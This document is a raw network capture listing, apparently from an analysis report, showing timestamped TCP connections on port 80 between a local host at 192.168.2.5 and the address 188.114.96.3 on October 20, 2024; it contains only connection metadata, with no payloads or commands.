                                                          Oct 20, 2024 18:19:01.905075073 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:01.910126925 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:01.925038099 CEST8050032188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:01.925107002 CEST5003280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:02.104469061 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:02.109317064 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.109525919 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.261285067 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:02.266161919 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.266210079 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.266218901 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.562510014 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:02.666228056 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:02.930489063 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.147876024 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.152664900 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.152710915 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.152805090 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.196873903 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.318171024 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.318344116 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.323299885 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.338063002 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.665529013 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.788907051 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.788953066 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.801537037 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.802766085 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.808254004 CEST8050034188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.808307886 CEST5003480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.808708906 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:03.808768034 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.808860064 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:03.814565897 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.118716955 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.119462967 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:04.125674963 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.166290998 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:04.171313047 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.171324015 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.171365976 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.296036005 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.296330929 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:04.301943064 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.301953077 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.301960945 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.591478109 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.650568962 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:04.688971043 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:04.759980917 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:04.960334063 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.150605917 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.379492044 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.379570007 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.385440111 CEST8050033188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.385514975 CEST8050035188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.385519981 CEST5003380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.385566950 CEST5003580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.387356997 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.392801046 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.392857075 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.395267963 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.401001930 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.744406939 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:05.749614954 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.749631882 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:05.749641895 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:06.171859026 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:06.259910107 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.400712967 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:06.463100910 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.529608011 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.534212112 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.751795053 CEST8050036188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:06.751854897 CEST5003680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.753233910 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:06.753302097 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.753427029 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:06.758410931 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.103729010 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.108660936 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.108673096 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.108683109 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.567118883 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.619265079 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.803344011 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.853663921 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.939870119 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.943348885 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.945429087 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.945498943 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.948163986 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.948240995 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.949949980 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.954756975 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.251403093 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:08.256268024 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.256339073 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:08.256623030 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:08.261507988 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.306811094 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:08.311779022 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.312191963 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.603768110 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:08.608886957 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.608899117 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.608906984 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.743805885 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.956645012 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.956707954 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.030966997 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.103610992 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.120368958 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.120970964 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.125992060 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.126054049 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.166107893 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.242268085 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.242916107 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.247869968 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.247940063 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.248065948 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.248141050 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.248241901 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.253257990 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.603818893 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.608814955 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.608939886 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.608952045 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:10.041174889 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:10.166105986 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.296482086 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:10.353622913 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.766653061 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.771821022 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:10.771903038 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.772001982 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.775949955 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.776973963 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:11.119282961 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:11.124242067 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:11.124342918 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:11.124353886 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:11.577857971 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:11.791119099 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:11.945928097 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.071830034 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.075223923 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.077678919 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.077744007 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.080049992 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.080130100 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.080239058 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.085338116 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.431759119 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.436624050 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.436650991 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.436662912 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.881131887 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.962941885 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.242223024 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:13.462945938 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.464538097 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:13.464601994 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.669367075 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.670136929 CEST5004380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.678294897 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:13.678350925 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.678778887 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:13.678850889 CEST5004380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.678982973 CEST5004380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.684319019 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.025645018 CEST5004380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:14.030678988 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.030710936 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.030723095 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.138240099 CEST5004480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:14.143270969 CEST8050044188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.143333912 CEST5004480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:14.143486023 CEST5004480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.426923990 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.431797028 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:36.431921005 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.436754942 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.442075014 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:36.511698008 CEST5006280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.792088032 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:36.797028065 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:36.797094107 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:36.797103882 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.224926949 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.353264093 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.481861115 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.481940985 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.591200113 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.665744066 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.710505009 CEST5006280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.710678101 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.711110115 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.716209888 CEST8050063188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.716267109 CEST5006380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.716470957 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:37.716536999 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.716609955 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:37.721438885 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.072079897 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.077641010 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.077657938 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.077796936 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.745183945 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.747435093 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.750354052 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.750473976 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.750596046 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.755497932 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.800211906 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.867765903 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.872840881 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.872968912 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.873116016 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:38.878072023 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.895139933 CEST8050064188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:38.895236015 CEST5006480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:39.103277922 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:39.108248949 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.108418941 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.228308916 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:39.233172894 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.233299017 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.233659029 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.576502085 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.665734053 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:39.804928064 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:39.853287935 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:40.928219080 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.011022091 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.301553965 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.415709972 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.431536913 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.431652069 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.432251930 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.436633110 CEST8050065188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.436676025 CEST5006580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.437148094 CEST8050066188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.437181950 CEST5006680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.437242985 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.437298059 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.437392950 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.442346096 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.790800095 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:41.919715881 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.920031071 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:41.920152903 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:42.879352093 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:42.965513945 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.257566929 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.353200912 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.388149023 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.388647079 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.393920898 CEST8050067188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.393970013 CEST5006780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.394480944 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.394546032 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.394727945 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.399589062 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.743916035 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:43.751084089 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.751095057 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:43.751398087 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.201756001 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.355544090 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.597099066 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.668320894 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.724751949 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.724761963 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.729743958 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.729974985 CEST8050068188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.730070114 CEST5006880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.730076075 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.730155945 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.735163927 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.807507038 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.812376022 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:44.812477112 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.812553883 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:44.817548990 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.087820053 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.092746973 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.092786074 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.092889071 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.165764093 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.170742035 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.170835972 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.511482000 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.600344896 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.638401031 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.665669918 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.852332115 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.853924990 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.859410048 CEST8050069188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:45.859463930 CEST5006980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:45.962538004 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.007520914 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.008506060 CEST5007180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.013302088 CEST8050070188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.013350010 CEST5007080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.013938904 CEST8050071188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.014004946 CEST5007180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.018698931 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.023658991 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.023726940 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.023811102 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.029189110 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.368858099 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:46.373794079 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.373811007 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.374466896 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.821268082 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:46.962542057 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.063595057 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:47.167531013 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.193727016 CEST5007180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.195791006 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.196397066 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.201108932 CEST8050072188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:47.201266050 CEST5007280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.201741934 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:47.201889038 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.201951981 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.206792116 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:47.556387901 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:47.561855078 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:47.561867952 CEST8050073188.114.96.3192.168.2.5
